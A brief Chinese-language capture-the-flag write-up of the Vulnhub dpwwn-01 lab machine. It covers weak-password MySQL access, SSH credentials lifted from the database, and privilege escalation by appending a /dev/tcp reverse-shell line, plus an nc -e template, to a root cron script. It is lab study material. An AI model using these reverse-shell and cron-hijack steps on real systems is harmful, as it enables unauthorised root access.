Vulnhub-dpwwn-01靶机过关记录

靶机地址：172.16.1.192

Kali

目录扫描

查看info.php

端口扫描

开放3306，尝试弱密码或爆破mysql。

账户为root，密码为空，成功登陆。

查看数据库；再查看ssh表

查看表中内容

得到Mistic testP@$$swordmistic

还开放有22端口，尝试登陆。登陆出错几次发现，账户名为小写。

登陆成功

尝试执行命令发现：不能执行sudo没有git、wget命令，也无法suid提权

查看家目录下边的文件，仅有一个.sh文件

使用curl，下载个枚举脚本看看

赋予脚本执行权限，并执行

发现在mistic用户目录下的logrot.sh是在计划任务内存中一个每3分钟以root权限运行的脚本

至此有了提权思路：以此由root执行的计划任务脚本为线索，利用从而得到root权限

思路：添加使用nc反弹shell的代码到logrot.sh文件中，在kali上监听一个端口以获得shell

先写入反向shell代码

　　echo "0<&126-;exec 126<>/dev/tcp/172.16.1.107/1234;sh <&126 >&126 2>&126 " >> logrot.sh

　　*格式说明：echo nc -e /bin/bash 攻击者IP 端口 > 计划任务所执行的脚本

再在Kali监听端口，过一段时间后获取shell。查看为root权限

最后获取flag，完成。

巴特西